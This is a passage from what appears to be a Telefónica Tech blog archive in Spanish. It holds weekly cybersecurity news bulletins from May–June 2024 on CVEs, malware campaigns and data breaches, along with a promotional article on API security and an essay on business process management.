dicho activo. Consecuentemente, en una serie de publicaciones en X, la compañía acusada de realizar ataque a la cadena de suministro ha negado estar involucrada en estos hechos y señala que están siendo difamados. No obstante, pese a estas declaraciones diferentes investigadores de seguridad recomiendan no hacer uso de dicha biblioteca a modo de prevención. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
28 de junio de 2024
Boletín de Ciberseguridad, 14 - 21 junio
Nuevas vulnerabilidades en VMware, dos de ellas críticas Broadcom ha publicado un aviso de seguridad en el que detalla tres vulnerabilidades que afectarían a VMware vCenter Server y que habrían sido recientemente parcheadas. En concreto, dos de estos fallos, CVE-2024-37079 y CVE-2024-37080, habrían sido clasificados con una severidad de 9.8 en la escala CVSSv3 según el proveedor. Ambas serían vulnerabilidades de tipo heap-overflow, afectarían a la implementación del protocolo DCE/RPC y podrían ser explotadas por un atacante que tuviera acceso a la red de vCenter Server, pudiendo ejecutar código remoto. Aunque Broadcom no distribuirá parches a las versiones de vSphere 6.5 y 6.7, la empresa ha afirmado no tener constancia de que los fallos se estén explotando de manera activa. Por otro lado, la tercera vulnerabilidad parcheada es CVE-2024-37081, CVSSv3 7.8 según fabricante, un fallo de escalada de privilegios locales debida a un error de configuración de sudo. Más info Campaña de malvertising distribuyendo malware El equipo de investigadores de Rapid7 ha publicado una investigación en la que informa sobre una campaña de malvertising suplantando a Google Chrome y Microsoft Teams para distribuir la puerta trasera Oyster, también conocida como Broomstick. En concreto, actores maliciosos tras estos hechos estarían creando sitios web similares a activos legítimos, como Microsoft Teams, con el objetivo de engañar a sus víctimas para que descarguen software legítimo cuando, en realidad, estaban descargando de forma ofuscada Oyster. Dicha herramienta, una vez se ejecuta en el dispositivo de la víctima, permite al actor malicioso realizar técnicas de enumeración, desplegar otras cargas útiles y ejecutar código remoto desde su servidor de comando y control. Cabe indicar que el uso de los dominios web maliciosos empleados presentan términos muy similares a los legítimos, salvo por algún carácter especial. Más info Nueva información sobre el compromiso de cuentas Snowflake Durante las últimas semanas varias han sido las noticias publicadas en relación a exposiciones de información sufridas por diferentes compañías cuyo nexo en común era el uso de sistemas de almacenamiento en la nube Snowflake. Recientemente, el medio WIRED ha realizado una nueva publicación relacionada con esta cuestión en la que afirman haberse comunicado con un miembro del grupo ShinyHunters, quien afirma que lograron el compromiso de alrededor de 165 cuentas mediante la intrusión en primer lugar de un contratista que trabaja con los clientes afectados a través de un ataque de phishing. En concreto, el trabajador pertenecería a la compañía EPAM Systems, una empresa de servicios digitales e ingeniería de software que proporciona diversos servicios gestionados para clientes de todo el mundo. No obstante, la compañía EPAM le comunicó al medio WIRED que no consideran que dicha campaña de ataques proceda de estos hechos, y sugieren que el actor se habría inventado dicha información. Más info Desarrollado un exploit para la vulnerabilidad CosmicSting La vulnerabilidad que ha sido denominada CosmicSting y que afectaría a sitios web de Adobe Commerce y Magento permitiría a los atacantes llevar a cabo una inyección de entidad externa XML (XXE) y la ejecución remota de código (RCE). También conocida como CVE-2024-34102, el fallo tiene un CVSSv3 de 9.8 según Adobe y, de acuerdo con lo publicado por Sansec, es la peor vulnerabilidad de Magento y Commerce en dos años debido a que, al ser combinada con otro fallo de Linux, concretamente CVE-2024-2961, permitiría a los actores de amenazas ejecutar código remoto de forma automática. Aunque Adobe ha publicado parches para CosmicSting, Sansec afirma que apenas un cuarto de las entidades afectadas habrían aplicado las actualizaciones. Asimismo, y debido también a que afirman haber desarrollado un exploit para CosmicSting que no habría sido publicado aun, Sansec insta a los usuarios a instalar los parches o, en caso de no poder, aplicar las mitigaciones de emergencia sugeridas en su publicación. Más info EE UU prohíbe el antivirus Kaspersky por motivos de seguridad La administración de Biden ha anunciado que prohibirá el uso del software antivirus de Kaspersky Lab en EE.UU. a partir de julio de 2024, citando preocupaciones de seguridad nacional. La medida impide tanto a individuos como a empresas estadounidenses utilizar productos de esta empresa rusa. Esta decisión sigue a una prohibición previa del uso de Kaspersky en agencias gubernamentales de EE.UU., establecida en 2017, debido a sospechas de vínculos entre la compañía y los servicios de inteligencia rusos. Kaspersky ha negado estas acusaciones y ha solicitado que se revoque la prohibición, argumentando que no hay pruebas que respalden las afirmaciones del gobierno de EE.UU. Los clientes actuales podrán seguir descargando el software, revenderlo y descargar nuevas actualizaciones durante 100 días. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
21 de junio de 2024
Mejora la seguridad de tus API con Web Application Defense (WAD)
Las API desempeñan un papel clave en los procesos de digitalización y modernización, mejorando significativamente la forma en que las empresas ofrecen, conectan y escalan sus aplicaciones. La seguridad de estas interfaces críticas, sin embargo, con frecuencia es insuficiente. A medida que se incrementa su uso, muchas empresas carecen de las herramientas, habilidades y el tiempo necesario para proteger sus API, nuevas o heredadas, frente a las ciberamenazas emergentes. Creciente superficie de ataque Las API son un componente fundamental en las prácticas de desarrollo ágil y las arquitecturas basadas en microservicios, ya que permiten una integración perfecta entre aplicaciones, sistemas y servicios. Pero mientras que las API aceleran el despliegue de aplicaciones también incrementan la superficie de ataque que hay que gestionar y proteger. Proteger las API a esta escala es complejo, ya que un error de configuración o una deficiencia en la seguridad puede exponer a las empresas a ciberamenazas ⚠️ El 92% de las empresas ha sufrido al menos un incidente de seguridad relacionado con API inseguras en los últimos 12 meses, y el 57% ha experimentado varios incidentes en el mismo periodo de tiempo, según Securing the API Attack Surface. Sin una seguridad y una supervisión centralizadas, las organizaciones siguen luchando por mantener unas posturas adecuadas de seguridad de sus API. Ciberamenazas avanzadas Las investigaciones muestran que más del 90% de los ciberataques basados en la Web tienen como objetivo los endpoints API. Por una buena razón: las API, un componente central de las aplicaciones web y móviles de hoy en día, manejan grandes volúmenes de datos y ofrecen a los atacantes una vía de acceso directa a sistemas empresariales críticos. Esto las convierte en el principal foco de un sinfín de exploits y actividades fraudulentas, como ataques distribuidos de denegación de servicio (DDoS), exfiltración de datos, usurpación de credenciales y ataques basados en bots. Para protegerse contra estas amenazas, las organizaciones necesitan un enfoque proactivo y por capas que proteja de forma integral las API frente a los ciberataques de hoy y de mañana. Como componente central de las aplicaciones web y móviles, las API manejan grandes volúmenes de datos y ofrecen a los atacantes una vía directa hacia sistemas empresariales críticos. Las API no gestionadas y no supervisadas A medida que las aplicaciones se extienden por múltiples nubes, centros de datos y el Edge, es fácil perder de vista qué API están en uso y dónde. Esto incluye las API en la sombra que se han creado sin la debida autorización, supervisión o documentación de TI, así como las API en desuso que pueden haber quedado obsoletas o abandonadas, pero que aún permanecen en los entornos. Las API no gestionadas crean enormes puntos ciegos para las organizaciones que elevan los perfiles de riesgo e introducen, sin saberlo, áreas de exposición. Sin embargo, salvaguardar estas API sigue siendo un reto, ya que las empresas carecen de la visibilidad necesaria para identificar y proteger las interfaces falsas e inactivas, independientemente de dónde se encuentren. Seguridad de API simplificada y probada Para seguir el ritmo del panorama actual de las API, en constante evolución, las organizaciones necesitan soluciones simplificadas y completas que protejan las interfaces a lo largo de todo su ciclo de vida. Telefónica Tech Web Application Defense (WAD) permite a las empresas de todos los tamaños proteger aplicaciones y API en entornos en la nube, locales y periféricos, todo desde un único servicio gestionado. Como parte de la cartera de soluciones NextDefense de Telefónica Tech, e impulsado por las tecnologías líderes de F5, WAD estandariza la seguridad y la gestión para proteger las API nuevas y heredadas frente a infracciones, usos indebidos o explotaciones malintencionadas. Ahora puedes disfrutar de una protección efectiva y gestionada, respaldada por el soporte permanente del equipo de expertos en seguridad de Telefónica Tech. Así es como Telefónica Tech WAD mejora la seguridad de las API para su empresa: Descubre automáticamente las API: Detecta y mapea las API para obtener una visión completa de las interfaces no documentadas, no gestionadas y expuestas. Estandariza las configuraciones: Genera y aplica automáticamente políticas de seguridad para centralizar la gobernanza y el control de API nuevas y heredadas. Rastrea la actividad maliciosa: Supervisa la seguridad de las líneas de base, identifica la actividad de los actores maliciosos y bloquea las conexiones e intentos no deseados en tiempo real. Prevén las infracciones cibernéticas: Mitigua los ataques avanzados en las capas de desarrollo y producción, incluidas las amenazas OWASP API Top 10, los ataques de día cero y DDoS, y los bots automatizados. Simplifica la gestión: Libera recursos internos sin necesidad de infraestructura, cambios de código ni conocimientos especializados. ✅ Es hora de reducir la complejidad y simplificar la protección de sus aplicaciones y API. Para obtener más información sobre WAD y la cartera de servicios gestionados NextDefense de Telefónica Tech, contacta con nosotros → Imagen: Rawpixel / Freepik.
20 de junio de 2024
La importancia de la gestión por procesos en las empresas
La optimización y la eficiencia son clave para cualquier empresa, de cualquier tamaño y sector. En Telefónica Tech entendemos que una gestión eficaz de los procesos es fundamental para alcanzar nuestros objetivos estratégicos y de negocio, y también para proporcionar un servicio excepcional a nuestros clientes. Es importante tener en cuenta que la gestión por procesos no es solo una forma de organizar el trabajo, sino también una cultura empresarial que implica a todos los niveles y áreas de la organización. En Telefónica Tech apostamos por una gestión por procesos transversal, integrada y orientada al cliente, que nos permita adaptarnos rápidamente a los cambios del mercado y a las necesidades de nuestros clientes. Pero, ¿qué implica exactamente la gestión por procesos y por qué es esencial para nosotros? Qué es la gestión por procesos Se trata de un enfoque metodológico que busca mejorar la eficiencia, la calidad y la agilidad de una organización al centrarse en los procesos que la componen. En Telefónica Tech concebimos los procesos como las secuencias de actividades interrelacionadas que transforman los insumos en productos o servicios de valor para nuestros clientes. Desde el desarrollo de productos hasta la atención al cliente, cada aspecto de nuestra compañía se rige por procesos que pueden optimizarse y mejorarse continuamente. Cada proceso, por pequeño que sea, contribuye al éxito general de la empresa. Importancia y beneficios de la gestión por procesos La gestión por procesos desempeña un papel fundamental en nuestra búsqueda constante de la excelencia operativa y nos permite: Mejorar la eficacia y la eficiencia: identificando y eliminando cuellos de botella, redundancias y actividades innecesarias, podemos agilizar nuestras operaciones y reducir los tiempos de entrega. Aumentar la calidad: al estandarizar los procesos y establecer medidas de control de calidad, podemos garantizar la consistencia y la fiabilidad en la entrega de nuestros productos y servicios. Fomentar la innovación: al entender a fondo nuestros procesos, podemos identificar oportunidades para la innovación y la mejora continua, lo que nos permite adaptarnos rápidamente a las cambiantes demandas del mercado. Entendiendo la gestión por procesos La gestión por procesos no es simplemente una mera función operativa, es parte de nuestra cultura organizacional. Reconocemos que cada proceso, por pequeño que sea, contribuye al éxito general de la empresa. Por lo tanto, se fomenta una mentalidad de mejora continua en todos los niveles de la organización. Nuestra estrategia se centra en alinear nuestros procesos con las normativas y estándares de calidad internacionales más relevantes. Esto no solo refuerza nuestra capacidad de cumplir con las expectativas regulatorias, sino que también nos posiciona como un referente de calidad y fiabilidad en el sector tecnológico. La gestión por procesos no es simplemente una mera función operativa, es parte de nuestra cultura organizacional. Herramientas clave: Mapas de Procesos y Adonis (Business Process Management System) Para facilitar la comprensión, la optimización, la divulgación, y la estandarización de nuestros procesos, empleamos herramientas como el Mapa de Procesos y el sistema de modelado Adonis. El Mapa de Procesos nos permite visualizar de manera clara y concisa cada proceso, identificar áreas de mejora y comunicar eficazmente. Por otro lado, el uso de BPMN (Business Process Model and Notation) en nuestra herramienta Adonis nos permite documentar y comunicar nuestros procesos de manera precisa y eficaz. Este lenguaje común facilita la comprensión y la implementación de procesos en toda la empresa, asegurando que todos los empleados, desde la alta dirección hasta los niveles operativos, comprendan sus roles y responsabilidades claramente. Conclusión La gestión por procesos es un pilar fundamental de cualquier estrategia empresarial. Al definir y optimizar nuestros procesos mejoramos nuestra eficiencia operativa, sino que también fortalecemos nuestra capacidad para innovar y ofrecer valor a nuestros clientes en un mercado cada vez más complejo y desafiante. Por tanto, es importante que las empresas adopten este enfoque sistémico y orientado al cliente, y que lo incorporen en su cultura y prácticas organizativas. Solo así podrán mantenerse competitivas y sostenibles en el largo plazo. Future Workplace Trucos y herramientas gratuitas para mejorar tu productividad digital 2 de abril de 2024
18 de junio de 2024
Boletín de Ciberseguridad, 8 - 13 junio
Vulnerabilidad crítica en PHP para Windows El investigador de seguridad Orange Tsai realizó una publicación en la que explica el descubrimiento de una vulnerabilidad crítica de PHP para Windows. En concreto, el fallo de seguridad fue registrado como CVE-2024-4577, CVSSv3 de 9.8 según fabricante, y se debe a un fallo en el manejo de las conversiones de codificación de caracteres, específicamente la función “Best-Fit” en Windows cuando PHP se usa en modo CGI. Cabe indicar que dicho descubrimiento fue realizado el 7 de mayo, momento en el que el investigador se puso en contacto con los desarrolladores de PHP, para posteriormente lanzar un parche de seguridad antes de su publicación. La vulnerabilidad afecta a todas las versiones desde la 5.x y desde Shadowserver alertan tanto de que actores maliciosos ya están comenzando a explotar el fallo de seguridad, como de que ya existe una PoC publicada. Más info Campaña contra entornos Snowflake por parte de UNC5537 El equipo de investigadores de Mandiant publicó una investigación en la que señalan que alrededor de 165 organizaciones se habrían visto afectadas por una campaña perpetrada por el actor amenaza UNC5537 contra sistemas de almacenamiento en la nube Snowflake. Según los expertos, dicho actor malicioso habría comprometido cientos de instancias de Snowflake utilizando credenciales de clientes robadas mediante malware como Lumma, Meta, Racoon Stealer, Redline, Risepro y Vidar. Posteriormente, UNC5537 se habría dirigido contra cuentas que no contaban con las protecciones de doble factor de autenticación para acceder a los entornos de las víctimas. Mandiant señala que no ha encontrado ninguna evidencia que sugiera que el acceso no autorizado a las cuentas de los clientes de Snowflake surgiera de un compromiso en la compañía Snowflake. Asimismo, estos señalan que los ataques comenzaron el pasado 14 de abril, momento en el que el actor comenzó a acceder a instancias ejecutando repetidamente comandos SQL para realizar reconocimientos y organizar y exfiltrar datos. Más info Patch Tuesday de Microsoft de junio Microsoft publicó su Patch Tuesday correspondiente al mes de junio en el que se corrigen un total de 51 vulnerabilidades, de las cuales una es considerada con riesgo crítico, 43 como importante y 7 han sido clasificadas como desconocido. Asimismo, cabe destacar que, de entre el total, hay una que se trata de una 0-day. En concreto, esta vulnerabilidad ha sido registrada como CVE-2023-50868, y se considera de tal manera debido a que es un fallo de seguridad divulgado previamente a tener una solución oficial disponible. Esta se refiere a una vulnerabilidad en la validación de DNSSEC, donde un atacante podría explotar los protocolos DNSSEC estándar destinados a la integridad de DNS mediante el uso de recursos, lo que provocaría una denegación de servicio para usuarios legítimos. Aparte de este fallo, destaca la considerada crítica, la cual ha sido registrada como CVE-2024-30080, CVSSv3 de 9.8, y que se trata de una vulnerabilidad de ejecución remota de código en Microsoft Message Queuing. Más info Nueva campaña de distribución de Agent Tesla dirigida a hispanohablantes La nueva campaña de distribución del malware Agent Tesla mediante emails de phishing estaría siendo dirigida contra usuarios hispanohablantes. De acuerdo con lo publicado por los investigadores de FortiGuard Labs, la cadena de ataque comenzaría con un email que incluiría un archivo Excel con un hiperlink OLE que se abriría automáticamente con Excel y que incluiría código para explotar la vulnerabilidad CVE-2017-0199 (CVSSv3 7.8). Posteriormente, también se aprovecharía el fallo CVE-2017-11882 (CVSSv3 7.8) para ejecutar código remoto en el Equation Editor de Microsoft Office. Los investigadores destacan que esta campaña estaría dirigida contra sistemas operativos Windows, y su finalidad sería la de obtener información sensible de las víctimas. Concretamente, la variante de Agent Tesla, un troyano de acceso remoto (RAT) escrito en .Net, detectada en esta campaña se caracteriza por presentar la capacidad de sustraer información de más de 80 aplicaciones, incluyendo credenciales de acceso, datos bancarios y capturas de pantalla. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
13 de junio de 2024
Boletín de Ciberseguridad, 26 mayo - 7 junio
Google corrige hasta 37 vulnerabilidades en el boletín de seguridad de Android de junio Google ha emitido el boletín de seguridad de Android correspondiente a junio de 2024 con el que soluciona hasta 37 vulnerabilidades, incluyendo varios fallos de elevación de privilegios. En la primera sección, con el nivel de parche 2024-06-01, se corrigen 19 fallos en Framework y System, siendo el más grave una vulnerabilidad en System que podría dar lugar a una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. Asimismo, otras siete fallas en System y doce en Framework, relacionados mayormente con la elevación de privilegios, han sido resueltas. En cuento a la segunda sección, con nivel de parche 2024-06-05, esta aborda 18 vulnerabilidades en componentes de Kernel, Imagination Technologies, Arm, MediaTek y Qualcomm, siendo tres fallos en Qualcomm los más críticos. Finalmente, Google no menciona que ninguna vulnerabilidad haya sido explotada. Sin embargo, se recomienda aplicar los parches de seguridad a la mayor brevedad posible. Más info Microsoft alerta sobre ataques a dispositivos OT Microsoft ha publicado un aviso sobre la importancia de la seguridad de dispositivos de tecnología operativa (OT) expuestos a internet, aviso motivado por la detección de una oleada de ciberataques dirigidos a este tipo de entornos desde finales de 2023. En concreto, Microsoft afirma que un ataque a dispositivos OT podría permitir a actores maliciosos manipular parámetros críticos utilizados en procesos industriales, provocando fallos de funcionamiento a través del controlador lógico programable (PLC) o utilizando los controles gráficos de la interfaz hombre-máquina (HMI). Asimismo, los sistemas OT son propicios a ser explotados por los atacantes debido a que tienden a carecer de los mecanismos de seguridad adecuados, lo cual también es agravado debido a los riesgos adicionales asociados a la conexión directa con internet. Más info Riesgo de ciberataques en los Juegos Olímpicos de París 2024 Los Juegos Olímpicos de París 2024 plantean una serie de preocupaciones en el ámbito de la ciberseguridad. Empresas como Google o Microsoft han publicado recientemente acerca de las ciberamenazas con mayor probabilidad de impactar contra entidades francesas con motivo de la celebración de los juegos en julio y agosto de este año. Mandiant ha alertado de la posibilidad de que diferentes tipos de actores maliciosos lleven a cabo ciberataques contra los Juegos. Las posibles tipologías de ataque incluirían operaciones de ciberespionaje e información, acciones hacktivistas o motivadas económicamente, así como otros ataques disruptivos y destructivos. Por otro lado, Microsoft ha destacado dos operaciones de información que se estarían llevando a cabo actualmente por los actores maliciosos Storm-1679 y Storm-1099, que tendrían como objetivo tanto atacar la reputación del Comité Olímpico Internacional como crear la expectativa de violencia en los Juegos. Más info Análisis de RansomHub señala su procedencia en ransomware Knight El equipo de investigadores de Symantec ha publicado un informe en el que señala que el origen del ransomware RansomHub sería el extinto Knight. En concreto, los expertos señalan que existen múltiples similitudes entre ambas familias de ransomware, entre ellas destaca que están escrita en Go y utilizan Gobfuscate para ofuscar, existe mucha superposición de código, las notas de rescate son similares, los menús de ayuda de la línea de comandos de los dos ransomware son idénticos, utilizan técnicas de ofuscación similar, entre otras. Cabe indicar que RansomHub apareció por primera vez en febrero de 2024, momento en el cual coincide con la venta del código fuente de Knight. En último lugar, se estima que RansomHub ha crecido hasta convertirse en una de las operaciones RaaS más prolíficas, ya que se atribuye que afiliados de otras herramientas como Blackcat, Notchy y Scattered Spider estarían tras ello. Más info La función Recall de Microsoft podría permitir la exfiltración de datos Investigadores de seguridad han demostrado cómo los actores de amenaza podrían robar datos recopilados por la función Recall de Microsoft. Recall, activada por defecto en nuevos PC Copilot+, permite a los usuarios de Windows encontrar fácilmente información vista anteriormente en su PC mediante capturas de pantalla periódicas. Microsoft intentó restar importancia asegurando que los datos se procesan localmente y se necesita acceso físico y credenciales válidas para obtenerlos, pero los investigadores han refutado esta afirmación. Concretamente, Marc-André Moreau mostró cómo una contraseña puede recuperarse fácilmente de una base de datos SQLite sin cifrar. Alexander Hagenah creó TotalRecall, una herramienta de código abierto que extrae datos de Recall. Asimismo, Kevin Beaumont advirtió que los infostealers pueden modificarse para robar datos de Recall, demostrando que un malware comercial puede exfiltrar información antes de ser detectado por Microsoft Defender. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
7 de junio de 2024
Boletín de Ciberseguridad, 25 - 31 mayo
Check Point corrige una vulnerabilidad utilizada en ataques aprovechando VPN El pasado lunes, en un advisory de seguridad publicado por Check Point, la empresa alertó de que actores de amenazas estarían dirigiendo sus ataques contra dispositivos Check Point Remote Access VPN para acceder a entornos corporativos. Posteriormente, el fabricante ha identificado que el problema venía de la explotación de una vulnerabilidad 0-day, la cual ha sido recientemente registrada como CVE-2024-24919, CVSSv3 de 7.5 según proveedor. El aprovechamiento de este fallo de seguridad podría permitir a un atacante leer información en puertas de enlace conectadas a Internet con VPN de acceso remoto o acceso móvil habilitado. Desde Check Point han indicado que esta vulnerabilidad afecta a CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways y Quantum Spark Appliances, en las versiones del producto R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x y R81.20. En base a ello, recomienda aplicar los correspondientes parches de seguridad para actualizar los activos afectados. Más info Bancos brasileños son objetivo del malware AllaSenha Las instituciones bancarias brasileñas son el objetivo de una nueva campaña que distribuye una variante del troyano de acceso remoto (RAT) basado en Windows llamada AllaSenha. Un producto de seguridad de HarfangLab detectó una carga maliciosa entregada a un ordenador en Brasil a través de una cadena de infección compleja que involucra scripts de Python y un cargador desarrollado en Delphi. El malware está específicamente dirigido a robar credenciales necesarias para acceder a cuentas bancarias brasileñas y utiliza la nube de Azure como infraestructura de comando y control (C2). Los objetivos de la campaña incluyen bancos como Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob y Sicredi. El vector de acceso inicial, aunque no ha sido confirmado definitivamente, apunta al uso de enlaces maliciosos en mensajes de phishing. Más info Troyano bancario Anatsa distribuyéndose en Google Play El equipo de investigadores de Zscaler ha publicado los resultados de una investigación en los que señala que más de 90 aplicaciones maliciosas con más de 5,5 millones de descargas habrían estado siendo distribuidas a través de Google Play. Entre las mismas, los expertos destacan el incremento del troyano bancario Anatsa, el cual destaca por apuntar a más de 650 aplicaciones de instituciones financieras en Europa, EE. UU. y Asia con el objetivo de robar credenciales de sus víctimas. En concreto, Zscaler señala que este software malicioso estaría distribuyéndose a través de dos aplicaciones llamadas “PDF Reader & File Manager” y “QR Reader & File Manager”, las cuales acumulan 70 000 descargas. Cabe destacar que, en estos momentos, las dos aplicaciones de Anatsa descubiertas por Zscaler han sido eliminadas de Google Play. Asimismo, cabe indicar que no se ha señalado el nombre de las restantes aplicaciones maliciosas identificadas. Más info Nueva vulnerabilidad 0-day activamente explotada en Chrome Google ha emitido un nuevo aviso de seguridad en el que alerta a sus usuarios sobre la aparición de una nueva vulnerabilidad 0-day que afecta al navegador Chrome y que se ha confirmado que está siendo explotada activamente. En concreto, el fallo de seguridad ha sido registrado como CVE-2024-5274 y se trata de una confusión de tipos de alta gravedad en V8, el motor JavaScript de Chrome responsable de ejecutar el código JS, por lo que actores maliciosos podrían aprovechar dicha vulnerabilidad y provocar fallos, corrupción de datos y ejecución de código arbitrario. Cabe indicar que, por el momento, desde Google no han compartido detalles técnicos sobre esta falla para proteger a los usuarios de posibles intentos de explotación. No obstante, el fabricante recomienda a sus usuarios actualizar Chrome en la versión 125.0.6422.112/.113 para Windows y Mac, mientras que los usuarios de Linux deberán esperar al lanzamiento de la versión 125.0.6422.112. Más info Análisis de la campaña de la APT LilacSquid Los investigadores de Cisco Talos han publicado un análisis de una nueva campaña de ciberespionaje y robo de datos que han atribuido a una APT a la que han denominado LilacSquid. Este actor de amenaza dirige sus ataques a entidades del sector tecnológico en EE. UU., del sector energía en Europa y del sector farmacéutico en Asia. Con respecto a sus ataques, LilacSquid ha sido observado empleando diversas herramientas y malware, incluyendo la herramienta de gestión remota MeshAgent. Asimismo, la APT ha empleado una variante de QuasarRAT que ha sido denominada PurpleInk, además de otros dos loaders de malware denominados InkBox e InkLoader. Por otro lado, los objetivos del actor parecen estar orientados a obtener acceso y persistencia a los sistemas de las víctimas para así obtener información relevante para la APT, comprometiendo aplicaciones y credenciales RDP en el proceso. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
31 de mayo de 2024
Boletín de Ciberseguridad, 18 - 24 mayo
Vulnerabilidad critica en Git que permite ejecución remota de código al clonar repositorios Recientemente se descubrió una vulnerabilidad crítica de ejecución remota de código en el comando clone de Git. Esta falla, identificada como CVE-2024-32002 y con una puntuación CVSSv3 de 9.0 según GitHub, es una vulnerabilidad que permite a repositorios Git con submódulos especialmente diseñados engañar a Git para que escriba archivos en un directorio. git/ en lugar de en el árbol de trabajo del submódulo. Esto permitía a los atacantes explotar enlaces simbólicos (symlinks) y así admitir la ejecución remota de código cuando una víctima clone un repositorio malicioso. Git ha corregido este problema garantizando el tratamiento adecuado de los directorios y los enlaces simbólicos. Además, la corrección incluye la comprobación de si un directorio contiene sólo un archivo .git y la cancelación de las operaciones para evitar la sobreescritura en determinadas condiciones. Por otro lado, se ha publicado una prueba de concepto (PoC), que demuestra cómo puede activarse la vulnerabilidad durante el proceso de clonación. Más info El análisis del tráfico de WhatsApp permitiría la vigilancia gubernamental The Intercept afirma haber podido acceder a una evaluación de amenazas de WhatsApp en la que la empresa afirmaba que sus usuarios eran vulnerables a una forma de vigilancia gubernamental. En concreto, y aunque la aplicación cifra las conversaciones entre usuarios, la empresa habría afirmado que el análisis del tráfico a escala nacional permitiría a un Estado discernir qué usuarios pertenecerían a grupos privados o qué usuarios se estarían comunicando entre sí, así como probablemente su localización. De acuerdo con lo publicado por The Intercept, esto preocuparía especialmente al personal de WhatsApp por su posible uso por parte de Israel para monitorizar ciudadanos palestinos. Sin embargo, la portavoz de WhatsApp habría indicado que este fallo no sería exclusivo de la aplicación, sino que el análisis de tráfico podría ser realizado con otros softwares de manera similar, y que no se trataría de una vulnerabilidad al uso sino de una utilidad puramente teórica. Más info Resurge el troyano bancario Grandoreiro El troyano bancario Grandoreiro, basado en Windows y operado como un Malware-as-a-Service (MaaS), ha resurgido en una campaña global desde marzo de 2024 tras una intervención de las fuerzas del orden en enero. El análisis del malware ha revelado importantes actualizaciones en el descifrado de cadenas y el algoritmo de generación de dominios (DGA), además de la capacidad de utilizar clientes de Microsoft Outlook en equipos infectados para propagar más correos electrónicos de phishing. La última variante del malware también apunta específicamente a más de 1500 bancos globales, permitiendo a los atacantes realizar fraudes bancarios en más de 60 países, incluyendo regiones de América Central y del Sur, África, Europa y el Indo-Pacífico. Más info Rockwell insta a desconectar dispositivos ICS de internet por amenazas cibernéticas Rockwell Automation ha advertido a sus clientes que desconecten de la Internet pública todos los sistemas de control industrial (ICS) que no están diseñados para la exposición en línea, debido al aumento de actividad maliciosa global. En el reciente aviso de seguridad emitido, la compañía recomienda no configurar estos dispositivos para permitir conexiones remotas desde fuera de la red local, con el fin de reducir la superficie de ataque. Con esta medida se pretende asegurar que los atacantes no puedan acceder a sistemas no parcheados contra vulnerabilidades de seguridad. En este sentido, Rockwell enfatiza la urgencia de eliminar la conectividad a Internet pública de dispositivos no diseñados para ella, reduciendo la exposición a ciberataques. Además, insta a los clientes a tomar medidas para mitigar vulnerabilidades específicas en dispositivos Rockwell ICS. Asimismo, CISA también ha emitido una alerta sobre este nuevo aviso de Rockwell para proteger los ICS de ciberataques. Más info ShrinkLocker emplea BitLocker para cifrar los dispositivos comprometidos Los actores de amenazas estarían empleando la utilidad BitLocker para llevar a cabo ataques de ransomware. Según una investigación de Secure List, el malware ShrinkLocker utiliza VBScript para descubrir, mediante un sondeo de Windows Management Instrumentation, la versión del sistema operativo de la víctima, tras lo cual realiza operaciones de redimensionamiento del disco en unidades fijas en lugar de unidades de red. Una vez ha reajustado el particionado y la configuración de arranque, con BitLocker activado y en funcionamiento, el malware cifra el almacenamiento del dispositivo comprometido. Finalmente, ShrinkLocker elimina la clave de descifrado local y las opciones de recuperación del usuario, apagando el sistema infectado y mostrando un mensaje que indica a la víctima que ya no existen estas opciones de recuperación de BitLocker. Asimismo, el malware tiene la capacidad de cambiar la etiqueta de las particiones, insertando la dirección email de los atacantes. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
24 de mayo de 2024
Boletín de Ciberseguridad, 11 - 17 mayo
La Universidad Complutense de Madrid sufre un ciberataque El pasado viernes varios medios digitales publicaban artículos informando que la Universidad Complutense de Madrid (UCM) había comunicado por correo electrónico a sus alumnos que habría sufrido una intrusión, dejando expuesta información personal de los mismos. En concreto, el incidente afectaría a la aplicación que gestiona las prácticas externas en empresas, por lo que nombres, direcciones, correo electrónico, números de DNI y diversa documentación pueden haber sido comprometidos por los actores maliciosos tras estos hechos. Debido a este incidente, la plataforma gestionada por la universidad permanece inoperativa y desde la Universidad aseguran que no les consta que se hayan filtrado las credenciales de los usuarios, pero recomiendan a sus alumnos modificarlas. La UCM informó que ha reforzado la seguridad y está trabajando con expertos en seguridad cibernética y las autoridades competentes para abordar la situación tras interponer la correspondiente denuncia. https://www.elmundo.es/madrid/2024/05/10/663e4244e9cf4a2e3d8b4599.html Patch Tuesday del mes de mayo de Microsoft Microsoft ha lanzado su Patch Tuesday correspondiente al mes de mayo en el que ha corregido un total de 61 vulnerabilidades, de las cuales una es considerada con riesgo crítico, 59 como importante y la que resta clasificada con riesgo moderado. Asimismo, cabe destacar que, de entre el total, 2 se tratan de 0-day activamente explotados. En concreto, dichos fallos de seguridad son los registrados como CVE-2024-30040, CVSSv3 de 8.8 según fabricante, el cual se trata de un error de omisión de la plataforma MSHTML de Windows, y CVE-2024-30051, CVSSv3 de 7.8 según fabricante, que es una vulnerabilidad de elevación de privilegios de la biblioteca principal del Administrador de ventanas de escritorio de Windows (DWM). En último lugar, cabe indicar que se da especial relevancia por su naturaleza a la vulnerabilidad CVE-2024-30044, un error de ejecución remota de código en Microsoft SharePoint Server. https://msrc.microsoft.com/update-guide/releaseNote/2024-May CISA y FBI publican un análisis del ransomware Black Basta En un informe conjunto del FBI, CISA, HHS (Department of Health and Human Services) y MS-ISAC (Multi-State Information 